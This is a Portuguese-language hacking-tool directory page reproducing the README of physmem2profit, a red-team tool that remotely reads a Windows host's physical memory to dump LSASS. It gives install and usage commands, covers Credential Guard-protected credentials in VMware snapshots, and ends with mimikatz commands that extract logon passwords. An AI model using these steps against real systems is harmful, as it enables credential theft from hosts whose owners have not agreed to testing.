Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/reverseclabs/physmem2profit
Memory ForensicsPassword AttacksData ExfiltrationPost-ExploitationDigital ForensicsPenetration TestingRed Teaming
GitHubreverseclabs/physmem2profit

physmem2profit

Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely

Ver Repositório
42274há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

Physmem2profit

O Physmem2profit pode ser usado para criar um minidump do processo LSASS de um host alvo ao analisar memória física remotamente. A intenção desta pesquisa é propor uma abordagem alternativa para roubo de credenciais e criar uma estrutura modular que possa ser estendida para suportar outros drivers que possam acessar a memória física. O Physmem2profit gera um minidump (.dmp) do LSASS que pode ser analisado posteriormente com o Mimikatz. A ferramenta não requer o Cobalt Strike, mas deve funcionar bem sobre o beacon com um proxy SOCKS.

A ideia é ilustrada abaixo:

Visão geral do Physmem2profit

A ferramenta tem dois componentes:

  1. O componente servidor em C#, physmem2profit.exe, executado no host alvo
    • Carrega o driver Winpmem e atua como um servidor, que expõe a RAM física do host alvo por meio de uma porta TCP
  2. O cliente, módulo Python physmem2profit, executado na máquina atacante
    • Quando executado com --mode mount, conecta-se à máquina alvo e monta a RAM física do alvo como um arquivo bruto com a ajuda do FUSE
    • Quando executado com --mode dump, chama vários plugins do Rekall para analisar a imagem de memória e gerar um minidump do processo LSASS.
    • Quando executado com --mode all, realiza ambas as ações acima. A conexão com o servidor será encerrada quando o dump for concluído.

Instruções de Instalação

  1. Clone o repositório Git do Physmem2profit: git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.git
  2. Para o servidor executado no computador alvo:
    1. Compile physmem2profit/server/Physmem2profit.sln com o Visual Studio
  3. Para o cliente executado na máquina atacante:
    1. bash physmem2profit/client/install.sh

Uso

  1. Execute physmem2profit.exe [--ip IP] [-p PORT] [--hidden] [--verbose] no alvo como administrador.
    • Você pode baixar o driver Winpmem assinado aqui. Este driver precisa estar presente no host alvo.
  2. Execute source physmem2profit/client/.env/bin/activate na máquina atacante. Este comando ativará o virtualenv criado pelo install.sh.
  3. Execute cd physmem2profit/client e python3 physmem2profit --host HOST [--port PORT] [--mode MODE] [--driver DRIVER ] [--instal DRIVER_PATH_ON_TARGET] [--label LABEL_FOR_MEMORY_DUMP] na máquina atacante
    • O physmem2profit.exe precisa estar em execução na máquina alvo antes de você executar este comando.
    • Isso gravará o minidump do LSASS em output/[label]-[date]-lsass.dmp na máquina atacante.
  4. Copie o minidump para um sistema Windows e execute mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"

Credential Guard

Descriptografar credenciais protegidas pelo Credential Guard requer obter acesso à chave de criptografia armazenada no Secure World. Para fins de teste, o Physmem2profit suporta a recuperação de dados do Secure World a partir de snapshots do VMware Fusion/Workstation (arquivos .vmem). Isso permite que credenciais protegidas pelo Credential Guard sejam descriptografadas com a ajuda do Mimikatz.

Configurando uma máquina virtual para testes

  1. Crie uma máquina virtual Windows 10 com VMware Fusion/Workstation. Associe a máquina virtual a um domínio (o Credential Guard não protege contas locais)
  2. Nas configurações avançadas, habilite o VBS (Virtualization Based Security - Segurança Baseada em Virtualização)
  3. Implante o Credential Guard. Uma opção fácil é usar a ferramenta de prontidão de hardware do Device Guard e Credential Guard
  4. Reinicie
  5. Execute msinfo32 para garantir que Virtualization-based security Services Running diga Credential Guard

Testes

  1. Faça login na máquina virtual (com uma conta de domínio)
  2. Tire um snapshot
  3. Execute o Physmem2profit contra o arquivo .vmem: python3 physmem2profit --mode dump --vmem /tmp/Win10-Snapshot1.vmem --label credential-guard-test
    • Isso gravará o minidump do LSASS em output/[label]-[date]-lsass.dmp. O minidump contém um stream especial que armazena os dados do Secure World, permitindo que o Mimikatz localize a chave de criptografia.
    • Os dados do Secure World também são armazenados em output/[label]-[date]-secure-world.raw.
    • Se o Rekall tiver problemas para analisar o arquivo .vmem, o Physmem2profit recomendará que você copie o arquivo .vmsn e o renomeie para .vmss
  4. Copie o minidump para um sistema Windows e execute mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"

Trabalho futuro

O suporte para contornar o Credential Guard explorando a vulnerabilidade de firmware do S3 Resume, demonstrada em nossa palestra no Disobey, está chegando em breve :).

Mais Informações

Repensando o Roubo de Credenciais | um post de blog explicando por que esta abordagem para roubo de credenciais foi escolhida.

O Physmem2profit é desenvolvido por @b3arr0 e @TimoHirvonen.

Agradecimentos pelas contribuições:

  • Janusz Szmigielski por refatorar o código para o primeiro lançamento
  • Pawel Kurowski por refatorar o código para o primeiro lançamento
  • Grzegorz Rychlik por refatorar o código para o primeiro lançamento
Baixar ferramenta